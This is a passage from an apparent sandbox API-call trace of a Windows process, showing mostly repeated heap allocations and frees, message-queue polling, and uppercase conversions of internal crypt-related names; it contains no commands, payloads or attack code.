out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0268.300] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0268.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0268.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.301] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0268.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0268.305] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0268.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0268.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0268.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.305] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.305] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0268.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0268.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0268.305] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0268.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0268.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0268.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0268.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0268.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0268.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0268.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0268.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0268.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0268.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0268.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0268.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0268.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0268.307] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0268.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0268.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.307] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0268.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.307] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0268.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0268.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0268.307] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0268.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0268.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0268.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0268.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0268.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0268.308] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0268.308] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.308] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0268.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0268.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0268.308] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0268.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0268.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0268.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0268.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0268.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0268.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0268.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0268.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0268.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0268.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0268.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0268.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0268.311] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0268.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.311] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0268.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0268.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0268.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.311] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.312] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0268.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0268.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0268.312] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0268.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0268.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0268.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0268.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0268.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0268.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0268.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0268.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0268.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516a0 [0268.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51730 [0268.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0268.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0268.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0268.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0268.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0268.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0268.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0268.314] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0268.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.314] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.314] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0268.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0268.314] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 